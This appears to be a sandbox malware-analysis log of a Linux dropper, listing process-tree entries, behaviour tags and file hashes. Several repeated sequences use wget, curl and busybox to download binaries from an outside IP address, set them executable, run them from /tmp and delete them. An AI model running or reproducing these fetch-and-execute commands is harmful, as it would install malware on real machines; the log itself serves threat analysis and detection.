/usr/bin/wgetwget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:927
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:933
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:939
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:945
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:951
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:957
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:964
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:967
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97